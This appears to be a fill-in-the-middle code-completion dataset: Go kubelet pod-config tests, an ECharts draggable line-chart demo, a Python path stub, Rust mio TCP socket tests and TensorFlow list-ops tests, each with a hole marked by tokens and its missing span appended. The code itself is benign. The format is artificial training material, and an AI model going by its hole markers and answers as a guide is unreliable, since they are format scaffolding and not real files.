s[i], s[j] = s[j], s[i] } func (s sortedPods) Less(i, j int) bool { return s[i].Namespace < s[j].Namespace } func CreateValidPod(name, namespace, source string) api.Pod { return api.Pod{ ObjectMeta: api.ObjectMeta{ UID: types.UID(name), // for the purpose of testing, this is unique enough Name: name, Namespace: namespace, Annotations: map[string]string{kubelet.ConfigSourceAnnotationKey: source}, }, Spec: api.PodSpec{ RestartPolicy: api.RestartPolicyAlways, DNSPolicy: api.DNSClusterFirst, Containers: []api.Container{{Name: "ctr", Image: "image", ImagePullPolicy: "IfNotPresent"}}, }, } } func CreatePodUpdate(op kubelet.PodOperation, source string, pods ...api.Pod) kubelet.PodUpdate { newPods := make([]api.Pod, len(pods)) for i := range pods { newPods[i] = pods[i] } return kubelet.PodUpdate{newPods, op, source} } func createPodConfigTester(mode PodConfigNotificationMode) (chan<- interface{}, <-chan kubelet.PodUpdate, *PodConfig) { config := NewPodConfig(mode, record.FromSource(api.EventSource{Component: "kubelet"})) channel := config.Channel(TestSource) ch := config.Updates() return channel, ch, config } func expectPodUpdate(t *testing.T, ch <-chan kubelet.PodUpdate, expected ...kubelet.PodUpdate) { for i := range expected { update := <-ch sort.Sort(sortedPods(update.Pods)) if !api.Semantic.DeepEqual(expected[i], update) { t.Fatalf("Expected %#v, Got %#v", expected[i], update) } } expectNoPodUpdate(t, ch) } func expectNoPodUpdate(t *testing.T, ch <-chan kubelet.PodUpdate) { select { case update := <-ch: t.Errorf("Expected no update in channel, Got %#v", update) default: } } func TestNewPodAdded(t *testing.T) { channel, ch, config := createPodConfigTester(PodConfigNotificationIncremental) // see an update podUpdate := CreatePodUpdate(kubelet.ADD, NoneSource, CreateValidPod("foo", "new", "")) channel <- podUpdate expectPodUpdate(t, ch, CreatePodUpdate(kubelet.ADD, NoneSource, CreateValidPod("foo", "new", "test"))) config.Sync() expectPodUpdate(t, ch, CreatePodUpdate(kubelet.SET, kubelet.AllSource, CreateValidPod("foo", "new", "test"))) } func TestNewPodAddedInvalidNamespace(t *testing.T) { channel, ch, config := createPodConfigTester(PodConfigNotificationIncremental) // see an update podUpdate := CreatePodUpdate(kubelet.ADD, NoneSource, CreateValidPod("foo", "", "")) channel <- podUpdate config.Sync() expectPodUpdate(t, ch, CreatePodUpdate(kubelet.SET, kubelet.AllSource)) } <|fim▁hole|>func TestNewPodAddedDefaultNamespace(t *testing.T) { channel, ch, config := createPodConfigTester(PodConfigNotificationIncremental) // see an update podUpdate := CreatePodUpdate(kubelet.ADD, NoneSource, CreateValidPod("foo", "default", "")) channel <- podUpdate expectPodUpdate(t, ch, CreatePodUpdate(kubelet.ADD, NoneSource, CreateValidPod("foo", "default", "test"))) config.Sync() expectPodUpdate(t, ch, CreatePodUpdate(kubelet.SET, kubelet.AllSource, CreateValidPod("foo", "default", "test"))) } func TestNewPodAddedDifferentNamespaces(t *testing.T) { channel, ch, config := createPodConfigTester(PodConfigNotificationIncremental) // see an update podUpdate := CreatePodUpdate(kubelet.ADD, NoneSource, CreateValidPod("foo", "default", "")) channel <- podUpdate expectPodUpdate(t, ch, CreatePodUpdate(kubelet.ADD, NoneSource, CreateValidPod("foo", "default", "test"))) // see an update in another namespace podUpdate = CreatePodUpdate(kubelet.ADD, NoneSource, CreateValidPod("foo", "new", "")) channel <- podUpdate expectPodUpdate(t, ch, CreatePodUpdate(kubelet.ADD, NoneSource, CreateValidPod("foo", "new", "test"))) config.Sync() expectPodUpdate(t, ch, CreatePodUpdate(kubelet.SET, kubelet.AllSource, CreateValidPod("foo", "default", "test"), CreateValidPod("foo", "new", "test"))) } func TestInvalidPodFiltered(t *testing.T) { channel, ch, _ := createPodConfigTester(PodConfigNotificationIncremental) // see an update podUpdate := CreatePodUpdate(kubelet.ADD, NoneSource, CreateValidPod("foo", "new", "")) channel <- podUpdate expectPodUpdate(t, ch, CreatePodUpdate(kubelet.ADD, NoneSource, CreateValidPod("foo", "new", "test"))) // add an invalid update podUpdate = CreatePodUpdate(kubelet.UPDATE, NoneSource, api.Pod{ObjectMeta: api.ObjectMeta{Name: "foo"}}) channel <- podUpdate expectNoPodUpdate(t, ch) } func TestNewPodAddedSnapshotAndUpdates(t *testing.T) { channel, ch, config := createPodConfigTester(PodConfigNotificationSnapshotAndUpdates) // see an set podUpdate := CreatePodUpdate(kubelet.ADD, NoneSource, CreateValidPod("foo", "new", "")) channel <- podUpdate expectPodUpdate(t, ch, CreatePodUpdate(kubelet.SET, TestSource, CreateValidPod("foo", "new", "test"))) config.Sync() expectPodUpdate(t, ch, CreatePodUpdate(kubelet.SET, kubelet.AllSource, CreateValidPod("foo", "new", "test"))) // container updates are separated as UPDATE pod := podUpdate.Pods[0] pod.Spec.Containers = []api.Container{{Name: "bar", Image: "test", ImagePullPolicy: api.PullIfNotPresent}} channel <- CreatePodUpdate(kubelet.ADD, NoneSource, pod) expectPodUpdate(t, ch, CreatePodUpdate(kubelet.UPDATE, NoneSource, pod)) } func TestNewPodAddedSnapshot(t *testing.T) { channel, ch, config := createPodConfigTester(PodConfigNotificationSnapshot) // see an set podUpdate := CreatePodUpdate(kubelet.ADD, NoneSource, CreateValidPod("foo", "new", "")) channel <- podUpdate expectPodUpdate(t, ch, CreatePodUpdate(kubelet.SET, TestSource, CreateValidPod("foo", "new", "test"))) config.Sync() expectPodUpdate(t, ch, CreatePodUpdate(kubelet.SET, kubelet.AllSource, CreateValidPod("foo", "new", "test"))) // container updates are separated as UPDATE pod := podUpdate.Pods[0] pod.Spec.Containers = []api.Container{{Name: "bar", Image: "test", ImagePullPolicy: api.PullIfNotPresent}} channel <- CreatePodUpdate(kubelet.ADD, NoneSource, pod) expectPodUpdate(t, ch, CreatePodUpdate(kubelet.SET, TestSource, pod)) } func TestNewPodAddedUpdatedRemoved(t *testing.T) { channel, ch, _ := createPodConfigTester(PodConfigNotificationIncremental) // should register an add podUpdate := CreatePodUpdate(kubelet.ADD, NoneSource, CreateValidPod("foo", "new", "")) channel <- podUpdate expectPodUpdate(t, ch, CreatePodUpdate(kubelet.ADD, NoneSource, CreateValidPod("foo", "new", "test"))) // should ignore ADDs that are identical expectNoPodUpdate(t, ch) // an kubelet.ADD should be converted to kubelet.UPDATE pod := CreateValidPod("foo", "new", "test") pod.Spec.Containers = []api.Container{{Name: "bar", Image: "test", ImagePullPolicy: api.PullIfNotPresent}} podUpdate = CreatePodUpdate(kubelet.ADD, NoneSource, pod) channel <- podUpdate expectPodUpdate(t, ch, CreatePodUpdate(kubelet.UPDATE, NoneSource, pod)) podUpdate = CreatePodUpdate(kubelet.REMOVE, NoneSource, api.Pod{ObjectMeta: api.ObjectMeta{Name: "foo", Namespace: "new"}}) channel <- podUpdate expectPodUpdate(t, ch, CreatePodUpdate(kubelet.REMOVE, NoneSource, pod)) } func TestNewPodAddedUpdatedSet(t *testing.T) { channel, ch, _ := createPodConfigTester(PodConfigNotificationIncremental) // should register an add podUpdate := CreatePodUpdate(kubelet.ADD, NoneSource, CreateValidPod("foo", "new", ""), CreateValidPod("foo2", "new", ""), CreateValidPod("foo3", "new", "")) channel <- podUpdate expectPodUpdate(t, ch, CreatePodUpdate(kubelet.ADD, NoneSource, CreateValidPod("foo", "new", "test"), CreateValidPod("foo2", "new", "test"), CreateValidPod("foo3", "new", "test"))) // should ignore ADDs that are identical expectNoPodUpdate(t, ch) // should be converted to an kubelet.ADD, kubelet.REMOVE, and kubelet.UPDATE pod := CreateValidPod("foo2", "new", "test") pod.Spec.Containers = []api.Container{{Name: "bar", Image: "test", ImagePullPolicy: api.PullIfNotPresent}} podUpdate = CreatePodUpdate(kubelet.SET, NoneSource, pod, CreateValidPod("foo3", "new", ""), CreateValidPod("foo4", "new", "test")) channel <- podUpdate expectPodUpdate(t, ch, CreatePodUpdate(kubelet.REMOVE, NoneSource, CreateValidPod("foo", "new", "test")), CreatePodUpdate(kubelet.ADD, NoneSource, CreateValidPod("foo4", "new", "test")), CreatePodUpdate(kubelet.UPDATE, NoneSource, pod)) }<|fim▁end|>
<|file_name|>dragdemo.js<|end_file_name|><|fim▁begin|>//数据的视觉映射 // 数据可视化是 数据 到 视觉元素 的映射过程(这个过程也可称为视觉编码,视觉元素也可称为视觉通道)。 // data ----> graph //使用visualmap提供通用的视觉映射 visualmap 属性有 1.图形类别symbol 2.图像大小symbolSize 3.颜色color 4.透明度opacity 5.颜色透明度 colorAlpha // 6.颜色明暗度colorLightness 7.颜色饱和度colorSturaction 8.色调colorHue //数据和维度 // 引入 ECharts 主模块 var echarts = require('echarts/lib/echarts'); require('echarts/lib/chart/line'); require('echarts/lib/component/graphic'); require('echarts/lib/component/tooltip'); var symbolSize = 20; // 这个 data 变量在这里单独声明,在后面也会用到。 var data = [[15, 0], [-50, 10], [-56.5, 20], [-46.5, 30], [-22.1, 40]]; var myChart = echarts.init(document.getElementById('root')); myChart.setOption({ tooltip: { // 表示不使用默认的『显示』『隐藏』触发规则。 triggerOn: 'none', formatter: function (params) { return 'X: ' + params.data[0].toFixed(2) + '<br>Y: ' + params.data[1].toFixed(2); } }, xAxis: {<|fim▁hole|> max: 80, type: 'value', axisLine: { onZero: false } }, yAxis: { min: -30, max: 60, type: 'value', axisLine: { onZero: false } }, series: [ { id: 'a', type: 'line', smooth: true, symbolSize: symbolSize, // 为了方便拖拽,把 symbolSize 尺寸设大了。 data: data } ] }); myChart.setOption({ // 声明一个 graphic component,里面有若干个 type 为 'circle' 的 graphic elements。 // 这里使用了 echarts.util.map 这个帮助方法,其行为和 Array.prototype.map 一样,但是兼容 es5 以下的环境。 // 用 map 方法遍历 data 的每项,为每项生成一个圆点。 graphic: echarts.util.map(data, function (dataItem, dataIndex) { return { // 'circle' 表示这个 graphic element 的类型是圆点。 type: 'circle', shape: { // 圆点的半径。 r: symbolSize / 2 }, // 用 transform 的方式对圆点进行定位。position: [x, y] 表示将圆点平移到 [x, y] 位置。 // 这里使用了 convertToPixel 这个 API 来得到每个圆点的位置,下面介绍。 position: myChart.convertToPixel('grid', dataItem), // 这个属性让圆点不可见(但是不影响他响应鼠标事件)。 invisible: true, // 这个属性让圆点可以被拖拽。 draggable: true, // 把 z 值设得比较大,表示这个圆点在最上方,能覆盖住已有的折线图的圆点。 z: 100, // 在 mouseover 的时候显示,在 mouseout 的时候隐藏。 onmousemove: echarts.util.curry(showTooltip, dataIndex), onmouseout: echarts.util.curry(hideTooltip, dataIndex), // 此圆点的拖拽的响应事件,在拖拽过程中会不断被触发。下面介绍详情。 // 这里使用了 echarts.util.curry 这个帮助方法,意思是生成一个与 onPointDragging // 功能一样的新的函数,只不过第一个参数永远为此时传入的 dataIndex 的值。 ondrag: echarts.util.curry(onPointDragging, dataIndex) }; }) }); // 拖拽某个圆点的过程中会不断调用此函数。 // 此函数中会根据拖拽后的新位置,改变 data 中的值,并用新的 data 值,重绘折线图,从而使折线图同步于被拖拽的隐藏圆点。 function onPointDragging(dataIndex) { // 这里的 data 就是本文最初的代码块中声明的 data,在这里会被更新。 // 这里的 this 就是被拖拽的圆点。this.position 就是圆点当前的位置。 data[dataIndex] = myChart.convertFromPixel('grid', this.position); // 用更新后的 data,重绘折线图。 myChart.setOption({ series: [{ id: 'a', data: data }] }); } window.addEventListener('resize', function () { // 对每个拖拽圆点重新计算位置,并用 setOption 更新。 myChart.setOption({ graphic: echarts.util.map(data, function (item, dataIndex) { return { position: myChart.convertToPixel('grid', item) }; }) }); }); function showTooltip(dataIndex) { myChart.dispatchAction({ type: 'showTip', seriesIndex: 0, dataIndex: dataIndex }); } function hideTooltip(dataIndex) { myChart.dispatchAction({ type: 'hideTip' }); }<|fim▁end|>
min: -100,
<|file_name|>formatting.py<|end_file_name|><|fim▁begin|><|fim▁hole|><|fim▁end|>
../../../../../../../share/pyshared/orca/scripts/apps/evolution/formatting.py
<|file_name|>test_tcp.rs<|end_file_name|><|fim▁begin|>use std::cmp;<|fim▁hole|>use std::sync::mpsc::channel; use std::thread; use std::time::Duration; use net2::{self, TcpStreamExt}; use {TryRead, TryWrite}; use mio::{Token, Ready, PollOpt, Poll, Events}; use iovec::IoVec; use mio::net::{TcpListener, TcpStream}; #[test] fn accept() { struct H { hit: bool, listener: TcpListener, shutdown: bool } let l = TcpListener::bind(&"127.0.0.1:0".parse().unwrap()).unwrap(); let addr = l.local_addr().unwrap(); let t = thread::spawn(move || { net::TcpStream::connect(&addr).unwrap(); }); let poll = Poll::new().unwrap(); poll.register(&l, Token(1), Ready::readable(), PollOpt::edge()).unwrap(); let mut events = Events::with_capacity(128); let mut h = H { hit: false, listener: l, shutdown: false }; while !h.shutdown { poll.poll(&mut events, None).unwrap(); for event in &events { h.hit = true; assert_eq!(event.token(), Token(1)); assert!(event.readiness().is_readable()); assert!(h.listener.accept().is_ok()); h.shutdown = true; } } assert!(h.hit); assert!(h.listener.accept().unwrap_err().kind() == io::ErrorKind::WouldBlock); t.join().unwrap(); } #[test] fn connect() { struct H { hit: u32, shutdown: bool } let l = net::TcpListener::bind("127.0.0.1:0").unwrap(); let addr = l.local_addr().unwrap(); let (tx, rx) = channel(); let (tx2, rx2) = channel(); let t = thread::spawn(move || { let s = l.accept().unwrap(); rx.recv().unwrap(); drop(s); tx2.send(()).unwrap(); }); let poll = Poll::new().unwrap(); let s = TcpStream::connect(&addr).unwrap(); poll.register(&s, Token(1), Ready::readable() | Ready::writable(), PollOpt::edge()).unwrap(); let mut events = Events::with_capacity(128); let mut h = H { hit: 0, shutdown: false }; while !h.shutdown { poll.poll(&mut events, None).unwrap(); for event in &events { assert_eq!(event.token(), Token(1)); match h.hit { 0 => assert!(event.readiness().is_writable()), 1 => assert!(event.readiness().is_readable()), _ => panic!(), } h.hit += 1; h.shutdown = true; } } assert_eq!(h.hit, 1); tx.send(()).unwrap(); rx2.recv().unwrap(); h.shutdown = false; while !h.shutdown { poll.poll(&mut events, None).unwrap(); for event in &events { assert_eq!(event.token(), Token(1)); match h.hit { 0 => assert!(event.readiness().is_writable()), 1 => assert!(event.readiness().is_readable()), _ => panic!(), } h.hit += 1; h.shutdown = true; } } assert_eq!(h.hit, 2); t.join().unwrap(); } #[test] fn read() { const N: usize = 16 * 1024 * 1024; struct H { amt: usize, socket: TcpStream, shutdown: bool } let l = net::TcpListener::bind("127.0.0.1:0").unwrap(); let addr = l.local_addr().unwrap(); let t = thread::spawn(move || { let mut s = l.accept().unwrap().0; let b = [0; 1024]; let mut amt = 0; while amt < N { amt += s.write(&b).unwrap(); } }); let poll = Poll::new().unwrap(); let s = TcpStream::connect(&addr).unwrap(); poll.register(&s, Token(1), Ready::readable(), PollOpt::edge()).unwrap(); let mut events = Events::with_capacity(128); let mut h = H { amt: 0, socket: s, shutdown: false }; while !h.shutdown { poll.poll(&mut events, None).unwrap(); for event in &events { assert_eq!(event.token(), Token(1)); let mut b = [0; 1024]; loop { if let Some(amt) = h.socket.try_read(&mut b).unwrap() { h.amt += amt; } else { break } if h.amt >= N { h.shutdown = true; break } } } } t.join().unwrap(); } #[test] fn peek() { const N: usize = 16 * 1024 * 1024; struct H { amt: usize, socket: TcpStream, shutdown: bool } let l = net::TcpListener::bind("127.0.0.1:0").unwrap(); let addr = l.local_addr().unwrap(); let t = thread::spawn(move || { let mut s = l.accept().unwrap().0; let b = [0; 1024]; let mut amt = 0; while amt < N { amt += s.write(&b).unwrap(); } }); let poll = Poll::new().unwrap(); let s = TcpStream::connect(&addr).unwrap(); poll.register(&s, Token(1), Ready::readable(), PollOpt::edge()).unwrap(); let mut events = Events::with_capacity(128); let mut h = H { amt: 0, socket: s, shutdown: false }; while !h.shutdown { poll.poll(&mut events, None).unwrap(); for event in &events { assert_eq!(event.token(), Token(1)); let mut b = [0; 1024]; match h.socket.peek(&mut b) { Ok(_) => (), Err(ref e) if e.kind() == io::ErrorKind::WouldBlock => { continue }, Err(e) => panic!("unexpected error: {:?}", e), } loop { if let Some(amt) = h.socket.try_read(&mut b).unwrap() { h.amt += amt; } else { break } if h.amt >= N { h.shutdown = true; break } } } } t.join().unwrap(); } #[test] fn read_bufs() { const N: usize = 16 * 1024 * 1024; let l = net::TcpListener::bind("127.0.0.1:0").unwrap(); let addr = l.local_addr().unwrap(); let t = thread::spawn(move || { let mut s = l.accept().unwrap().0; let b = [1; 1024]; let mut amt = 0; while amt < N { amt += s.write(&b).unwrap(); } }); let poll = Poll::new().unwrap(); let mut events = Events::with_capacity(128); let s = TcpStream::connect(&addr).unwrap(); poll.register(&s, Token(1), Ready::readable(), PollOpt::level()).unwrap(); let b1 = &mut [0; 10][..]; let b2 = &mut [0; 383][..]; let b3 = &mut [0; 28][..]; let b4 = &mut [0; 8][..]; let b5 = &mut [0; 128][..]; let mut b: [&mut IoVec; 5] = [ b1.into(), b2.into(), b3.into(), b4.into(), b5.into(), ]; let mut so_far = 0; loop { for buf in b.iter_mut() { for byte in buf.as_mut_bytes() { *byte = 0; } } poll.poll(&mut events, None).unwrap(); match s.read_bufs(&mut b) { Ok(0) => { assert_eq!(so_far, N); break } Ok(mut n) => { so_far += n; for buf in b.iter() { let buf = buf.as_bytes(); for byte in buf[..cmp::min(n, buf.len())].iter() { assert_eq!(*byte, 1); } n = n.saturating_sub(buf.len()); if n == 0 { break } } assert_eq!(n, 0); } Err(e) => assert_eq!(e.kind(), io::ErrorKind::WouldBlock), } } t.join().unwrap(); } #[test] fn write() { const N: usize = 16 * 1024 * 1024; struct H { amt: usize, socket: TcpStream, shutdown: bool } let l = net::TcpListener::bind("127.0.0.1:0").unwrap(); let addr = l.local_addr().unwrap(); let t = thread::spawn(move || { let mut s = l.accept().unwrap().0; let mut b = [0; 1024]; let mut amt = 0; while amt < N { amt += s.read(&mut b).unwrap(); } }); let poll = Poll::new().unwrap(); let s = TcpStream::connect(&addr).unwrap(); poll.register(&s, Token(1), Ready::writable(), PollOpt::edge()).unwrap(); let mut events = Events::with_capacity(128); let mut h = H { amt: 0, socket: s, shutdown: false }; while !h.shutdown { poll.poll(&mut events, None).unwrap(); for event in &events { assert_eq!(event.token(), Token(1)); let b = [0; 1024]; loop { if let Some(amt) = h.socket.try_write(&b).unwrap() { h.amt += amt; } else { break } if h.amt >= N { h.shutdown = true; break } } } } t.join().unwrap(); } #[test] fn write_bufs() { const N: usize = 16 * 1024 * 1024; let l = net::TcpListener::bind("127.0.0.1:0").unwrap(); let addr = l.local_addr().unwrap(); let t = thread::spawn(move || { let mut s = l.accept().unwrap().0; let mut b = [0; 1024]; let mut amt = 0; while amt < N { for byte in b.iter_mut() { *byte = 0; } let n = s.read(&mut b).unwrap(); amt += n; for byte in b[..n].iter() { assert_eq!(*byte, 1); } } }); let poll = Poll::new().unwrap(); let mut events = Events::with_capacity(128); let s = TcpStream::connect(&addr).unwrap(); poll.register(&s, Token(1), Ready::writable(), PollOpt::level()).unwrap(); let b1 = &[1; 10][..]; let b2 = &[1; 383][..]; let b3 = &[1; 28][..]; let b4 = &[1; 8][..]; let b5 = &[1; 128][..]; let b: [&IoVec; 5] = [ b1.into(), b2.into(), b3.into(), b4.into(), b5.into(), ]; let mut so_far = 0; while so_far < N { poll.poll(&mut events, None).unwrap(); match s.write_bufs(&b) { Ok(n) => so_far += n, Err(e) => assert_eq!(e.kind(), io::ErrorKind::WouldBlock), } } t.join().unwrap(); } #[test] fn connect_then_close() { struct H { listener: TcpListener, shutdown: bool } let poll = Poll::new().unwrap(); let l = TcpListener::bind(&"127.0.0.1:0".parse().unwrap()).unwrap(); let s = TcpStream::connect(&l.local_addr().unwrap()).unwrap(); poll.register(&l, Token(1), Ready::readable(), PollOpt::edge()).unwrap(); poll.register(&s, Token(2), Ready::readable(), PollOpt::edge()).unwrap(); let mut events = Events::with_capacity(128); let mut h = H { listener: l, shutdown: false }; while !h.shutdown { poll.poll(&mut events, None).unwrap(); for event in &events { if event.token() == Token(1) { let s = h.listener.accept().unwrap().0; poll.register(&s, Token(3), Ready::readable() | Ready::writable(), PollOpt::edge()).unwrap(); drop(s); } else if event.token() == Token(2) { h.shutdown = true; } } } } #[test] fn listen_then_close() { let poll = Poll::new().unwrap(); let l = TcpListener::bind(&"127.0.0.1:0".parse().unwrap()).unwrap(); poll.register(&l, Token(1), Ready::readable(), PollOpt::edge()).unwrap(); drop(l); let mut events = Events::with_capacity(128); poll.poll(&mut events, Some(Duration::from_millis(100))).unwrap(); for event in &events { if event.token() == Token(1) { panic!("recieved ready() on a closed TcpListener") } } } fn assert_send<T: Send>() { } fn assert_sync<T: Sync>() { } #[test] fn test_tcp_sockets_are_send() { assert_send::<TcpListener>(); assert_send::<TcpStream>(); assert_sync::<TcpListener>(); assert_sync::<TcpStream>(); } #[test] fn bind_twice_bad() { let l1 = TcpListener::bind(&"127.0.0.1:0".parse().unwrap()).unwrap(); let addr = l1.local_addr().unwrap(); assert!(TcpListener::bind(&addr).is_err()); } #[test] fn multiple_writes_immediate_success() { const N: usize = 16; let l = net::TcpListener::bind("127.0.0.1:0").unwrap(); let addr = l.local_addr().unwrap(); let t = thread::spawn(move || { let mut s = l.accept().unwrap().0; let mut b = [0; 1024]; let mut amt = 0; while amt < 1024*N { for byte in b.iter_mut() { *byte = 0; } let n = s.read(&mut b).unwrap(); amt += n; for byte in b[..n].iter() { assert_eq!(*byte, 1); } } }); let poll = Poll::new().unwrap(); let mut s = TcpStream::connect(&addr).unwrap(); poll.register(&s, Token(1), Ready::writable(), PollOpt::level()).unwrap(); let mut events = Events::with_capacity(16); // Wait for our TCP stream to connect 'outer: loop { poll.poll(&mut events, None).unwrap(); for event in events.iter() { if event.token() == Token(1) && event.readiness().is_writable() { break 'outer } } } for _ in 0..N { s.write(&[1; 1024]).unwrap(); } t.join().unwrap(); } #[test] fn connection_reset_by_peer() { let poll = Poll::new().unwrap(); let mut events = Events::with_capacity(16); let mut buf = [0u8; 16]; // Create listener let l = TcpListener::bind(&"127.0.0.1:0".parse().unwrap()).unwrap(); let addr = l.local_addr().unwrap(); // Connect client let client = net2::TcpBuilder::new_v4().unwrap() .to_tcp_stream().unwrap(); client.set_linger(Some(Duration::from_millis(0))).unwrap(); client.connect(&addr).unwrap(); // Convert to Mio stream let client = TcpStream::from_stream(client).unwrap(); // Register server poll.register(&l, Token(0), Ready::readable(), PollOpt::edge()).unwrap(); // Register interest in the client poll.register(&client, Token(1), Ready::readable() | Ready::writable(), PollOpt::edge()).unwrap(); // Wait for listener to be ready let mut server; 'outer: loop { poll.poll(&mut events, None).unwrap(); for event in &events { if event.token() == Token(0) { match l.accept() { Ok((sock, _)) => { server = sock; break 'outer; } Err(ref e) if e.kind() == io::ErrorKind::WouldBlock => {} Err(e) => panic!("unexpected error {:?}", e), } } } } // Close the connection drop(client); // Wait a moment thread::sleep(Duration::from_millis(100)); // Register interest in the server socket poll.register(&server, Token(3), Ready::readable(), PollOpt::edge()).unwrap(); loop { poll.poll(&mut events, None).unwrap(); for event in &events { if event.token() == Token(3) { assert!(event.readiness().is_readable()); match server.read(&mut buf) { Ok(0) | Err(_) => {}, Ok(x) => panic!("expected empty buffer but read {} bytes", x), } return; } } } } #[test] #[cfg_attr(target_os = "fuchsia", ignore)] fn connect_error() { let poll = Poll::new().unwrap(); let mut events = Events::with_capacity(16); // Pick a "random" port that shouldn't be in use. let l = TcpStream::connect(&"127.0.0.1:38381".parse().unwrap()).unwrap(); poll.register(&l, Token(0), Ready::writable(), PollOpt::edge()).unwrap(); 'outer: loop { poll.poll(&mut events, None).unwrap(); for event in &events { if event.token() == Token(0) { assert!(event.readiness().is_writable()); break 'outer } } } assert!(l.take_error().unwrap().is_some()); } #[test] fn write_error() { let poll = Poll::new().unwrap(); let mut events = Events::with_capacity(16); let (tx, rx) = channel(); let listener = net::TcpListener::bind("127.0.0.1:0").unwrap(); let addr = listener.local_addr().unwrap(); let t = thread::spawn(move || { let (conn, _addr) = listener.accept().unwrap(); rx.recv().unwrap(); drop(conn); }); let mut s = TcpStream::connect(&addr).unwrap(); poll.register(&s, Token(0), Ready::readable() | Ready::writable(), PollOpt::edge()).unwrap(); let mut wait_writable = || { 'outer: loop { poll.poll(&mut events, None).unwrap(); for event in &events { if event.token() == Token(0) && event.readiness().is_writable() { break 'outer } } } }; wait_writable(); tx.send(()).unwrap(); t.join().unwrap(); let buf = [0; 1024]; loop { match s.write(&buf) { Ok(_) => {} Err(ref e) if e.kind() == io::ErrorKind::WouldBlock => { wait_writable() } Err(e) => { println!("good error: {}", e); break } } } }<|fim▁end|>
use std::io::prelude::*; use std::io; use std::net;
<|file_name|>list_ops_test.py<|end_file_name|><|fim▁begin|># Copyright 2018 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for ops which manipulate lists of tensors.""" # pylint: disable=g-bad-name from __future__ import absolute_import from __future__ import division from __future__ import print_function from absl.testing import parameterized import numpy as np # pylint: disable=unused-import from tensorflow.python.client import session from tensorflow.python.eager import backprop from tensorflow.python.eager import context from tensorflow.python.framework import constant_op from tensorflow.python.framework import dtypes from tensorflow.python.framework import errors from tensorflow.python.framework import ops from tensorflow.python.framework import tensor_shape from tensorflow.python.framework import test_util from tensorflow.python.ops import array_ops from tensorflow.python.ops import control_flow_ops from tensorflow.python.ops import gradients_impl from tensorflow.python.ops import list_ops from tensorflow.python.ops import math_ops from tensorflow.python.ops import state_ops from tensorflow.python.ops import variable_scope as vs from tensorflow.python.platform import test @test_util.run_all_in_graph_and_eager_modes class ListOpsTest(test_util.TensorFlowTestCase, parameterized.TestCase): def _testPushPop(self, max_num_elements): l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=[], max_num_elements=max_num_elements) l = list_ops.tensor_list_push_back(l, constant_op.constant(1.0)) l, e = list_ops.tensor_list_pop_back(l, element_dtype=dtypes.float32) self.assertAllEqual(self.evaluate(e), 1.0) @parameterized.named_parameters(("NoMaxNumElements", None), ("WithMaxNumElements", 2)) def testPushPop(self, max_num_elements): self._testPushPop(max_num_elements) @parameterized.named_parameters(("NoMaxNumElements", None), ("WithMaxNumElements", 2)) def testPushPopGPU(self, max_num_elements): if not context.num_gpus(): return with context.device("gpu:0"): self._testPushPop(max_num_elements) @test_util.run_deprecated_v1 def testPushInFullListFails(self): l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=[], max_num_elements=1) l = list_ops.tensor_list_push_back(l, constant_op.constant(1.0)) with self.assertRaisesRegexp(errors.InvalidArgumentError, "Tried to push item into a full list"): l = list_ops.tensor_list_push_back(l, 2.) self.evaluate(l) @parameterized.named_parameters(("NoMaxNumElements", None), ("WithMaxNumElements", 2)) @test_util.run_deprecated_v1 def testPopFromEmptyTensorListFails(self, max_num_elements): l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=[], max_num_elements=max_num_elements) with self.assertRaisesRegexp(errors.InvalidArgumentError, "Trying to pop from an empty list"): l = list_ops.tensor_list_pop_back(l, element_dtype=dtypes.float32) self.evaluate(l) def _testStack(self, max_num_elements): l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=[], max_num_elements=max_num_elements) l = list_ops.tensor_list_push_back(l, constant_op.constant(1.0)) l = list_ops.tensor_list_push_back(l, constant_op.constant(2.0)) t = list_ops.tensor_list_stack(l, element_dtype=dtypes.float32) if not context.executing_eagerly(): self.assertAllEqual(t.shape.as_list(), [None]) self.assertAllEqual(self.evaluate(t), [1.0, 2.0]) @parameterized.named_parameters(("NoMaxNumElements", None), ("WithMaxNumElements", 2)) def testStack(self, max_num_elements): self._testStack(max_num_elements) @parameterized.named_parameters(("NoMaxNumElements", None), ("WithMaxNumElements", 2)) def testStackGPU(self, max_num_elements): if not context.num_gpus(): return with context.device("gpu:0"): self._testStack(max_num_elements) @parameterized.named_parameters(("NoMaxNumElements", None), ("WithMaxNumElements", 3)) @test_util.run_deprecated_v1 def testStackWithUnknownElementShape(self, max_num_elements): l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=None, max_num_elements=max_num_elements) l = list_ops.tensor_list_push_back(l, constant_op.constant(1.0)) l = list_ops.tensor_list_push_back(l, constant_op.constant(2.0)) t = list_ops.tensor_list_stack(l, element_dtype=dtypes.float32) self.assertAllEqual(self.evaluate(t), [1.0, 2.0]) # Should raise an error when the element tensors do not all have the same # shape. with self.assertRaisesRegexp(errors.InvalidArgumentError, "unequal shapes"): l = list_ops.tensor_list_push_back(l, constant_op.constant([3.0, 4.0])) t = list_ops.tensor_list_stack(l, element_dtype=dtypes.float32) self.evaluate(t) @parameterized.named_parameters(("NoMaxNumElements", None), ("WithMaxNumElements", 3)) @test_util.run_deprecated_v1 def testStackWithPartiallyDefinedElementShape(self, max_num_elements): l = list_ops.empty_tensor_list( element_dtype=dtypes.float32, element_shape=[None], max_num_elements=max_num_elements) l = list_ops.tensor_list_push_back(l, constant_op.constant([1.0])) l = list_ops.tensor_list_push_back(l, constant_op.constant([2.0])) t = list_ops.tensor_list_stack(l, element_dtype=dtypes.float32) self.assertAllEqual(self.evaluate(t), [[1.0], [2.0]]) # Should raise an error when the element tensors do not all have the same # shape. with self.assertRaisesRegexp(errors.InvalidArgumentError, "unequal shapes"): l = list_ops.tensor_list_push_back(l, constant_op.constant([2.0, 3.0])) t = list_ops.tensor_list_stack(l, element_dtype=dtypes.float32) self.evaluate(t) @parameterized.named_parameters(("NoMaxNumElements", None), ("WithMaxNumElements", 2)) @test_util.run_deprecated_v1 def testStackEmptyList(self, max_num_elements): # Should be able to stack empty lists with fully defined element_shape. l = 